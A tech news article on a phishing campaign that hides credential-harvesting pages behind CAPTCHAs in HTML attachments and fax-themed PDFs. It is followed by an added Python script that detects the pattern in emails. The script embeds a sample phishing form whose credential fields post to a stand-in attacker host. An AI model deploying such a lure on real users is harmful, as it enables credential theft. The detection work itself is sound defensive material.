Hackers spotted using CAPTCHAs to dodge email security scanners

A CAPTCHA verification check on a data entry field

A new phishing campaign has been discovered using CAPTCHA verification tests to bypass email security scanners.

CAPTCHAs are cognitive tests that websites present to ensure that they're interacting with humans rather than automated bots.


According to cyber security company Avanan, the new campaign is using a technique that the company itself demonstrated over a year ago to bypass secure email gateways.

Email scanners typically compare links in emails against a known list of malicious domains gathered from threat intelligence feeds and blacklists. Sending a CAPTCHA instead of a direct URL effectively masks the phishing link from automated checks, as it takes human interaction to solve.

Phishing emails using CAPTCHAs attach them as HTML files that look clean to a secure email gateway, Avanan said. Some email clients might even render the HTML file inline when displaying the message if they can't find anything dangerous about it.

If a victim opens the HTML file containing a CAPTCHA and solves it, the browser will then show them a phishing page asking them to enter their credentials.

Avanan has found attackers using this technique when sending emails from legitimate domains. In one case, the company said that a criminal used a compromised university domain to send an email containing a CAPTCHA.

Instead of embedding the test in an HTML file, the attacker uses a non-password-protected PDF purporting to be a faxed document. When opened, the PDF takes the user to a site with a CAPTCHA.

Upon solving the CAPTCHA, the phishing site presents the victim with a fake Microsoft authentication window asking for their login credentials.

Attackers typically use Google's reCAPTCHA service, which Google provides free to developers. Because security scanning systems can't realistically block Google, the reCAPTCHA is sure to be delivered, Avanan explains. Using a spoofed Microsoft OneDrive site adds another layer of apparent legitimacy to the phishing attack, researchers added.
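The gap Avanan describes is easy to see in code: a gateway that only compares body links against a domain blacklist never looks inside an attached HTML file, while a content check on the attachment itself flags the CAPTCHA widget and the credential form. The following Python script is an added illustration, not Avanan's tooling or anything from the article; the message, the domain names and the blacklist are all constructed for the example.

```python
"""Detect the CAPTCHA-gated phishing pattern described in the article.

Added example, not Avanan's code. The sample message, the domains and the
blacklist below are constructed stand-ins, not real indicators.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed stand-in for a threat-intel domain blacklist (hypothetical names).
BLACKLIST = {"evil-phish.example", "bad-login.example"}

# Markers of an embedded reCAPTCHA widget and of a credential form.
RECAPTCHA_RE = re.compile(r"recaptcha/api\.js|class=[\"']g-recaptcha[\"']|data-sitekey=", re.I)
PASSWORD_INPUT_RE = re.compile(r"<input[^>]*type=[\"']password[\"']", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

# Constructed lure modelled on the article: CAPTCHA widget gating a login form,
# delivered as an attachment so the e-mail body carries no URL at all.
LURE_HTML = """<html><body>
<form action="https://evil-phish.example/verify" method="post">
  <div class="g-recaptcha" data-sitekey="PLACEHOLDER_SITE_KEY"></div>
  <script src="https://www.google.com/recaptcha/api.js"></script>
  <input type="email" name="user"><input type="password" name="pass">
</form></body></html>"""


def blacklist_hits(message: EmailMessage) -> set[str]:
    """The classic gateway check: domains linked from the body vs. the blacklist."""
    body = message.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body else ""
    return {d.lower() for d in URL_RE.findall(text)} & BLACKLIST


def attachment_findings(message: EmailMessage) -> list[str]:
    """Content checks on attachments, which the link blacklist never examines."""
    findings = []
    for part in message.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        ctype = part.get_content_type()
        if ctype == "text/html" or name.lower().endswith((".htm", ".html")):
            html = part.get_content()
            if isinstance(html, bytes):
                html = html.decode("utf-8", "replace")
            if RECAPTCHA_RE.search(html):
                findings.append(f"{name}: HTML attachment embeds a reCAPTCHA widget")
            if PASSWORD_INPUT_RE.search(html):
                findings.append(f"{name}: HTML attachment contains a password field")
        elif ctype == "application/pdf" or name.lower().endswith(".pdf"):
            # The PDF variant in the article: flag for verification with the sender.
            findings.append(f"{name}: PDF attachment, confirm with the sender before opening")
    return findings


def build_sample_message() -> bytes:
    """Constructed message in the article's shape: clean body, HTML attachment."""
    msg = EmailMessage()
    msg["From"] = "scanner@university.example"  # stands in for a compromised legitimate domain
    msg["To"] = "victim@corp.example"
    msg["Subject"] = "Fax received"
    msg.set_content("A fax was received for you. Open the attached document to view it.")
    msg.add_attachment(LURE_HTML, subtype="html", filename="fax-document.html")
    return msg.as_bytes()


def scan(raw: bytes) -> dict:
    """Run both checks over a raw RFC 822 message and report the results."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return {
        "blacklist_hits": blacklist_hits(msg),
        "attachment_findings": attachment_findings(msg),
    }


if __name__ == "__main__":
    for key, value in scan(build_sample_message()).items():
        print(f"{key}: {value}")
```

On the constructed message the blacklist check returns nothing, because the body contains no link at all, while the attachment check reports both the reCAPTCHA widget and the password field. In a real gateway the attachment checks would be one input to a verdict rather than a block on their own, since legitimate HTML attachments can also contain forms.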

Avanan's best practices for avoiding the attack focus on user awareness rather than technical solutions.

Users should check URLs before filling out CAPTCHA forms, it said. They should also ask whether the PDF should have been password protected, and ask the sender whether they were in the office or working from home. "If working from home, odds are that they did not fax it," the company concluded.

Danny Bradbury

Danny Bradbury has been a print journalist specialising in technology since 1989 and a freelance writer since 1994. He has written for national publications on both sides of the Atlantic and has won awards for his investigative cybersecurity journalism work and his arts and culture writing. 

Danny writes about many different technology issues for audiences ranging from consumers through to software developers and CIOs. He also ghostwrites articles for many C-suite business executives in the technology sector and has worked as a presenter for multiple webinars and podcasts.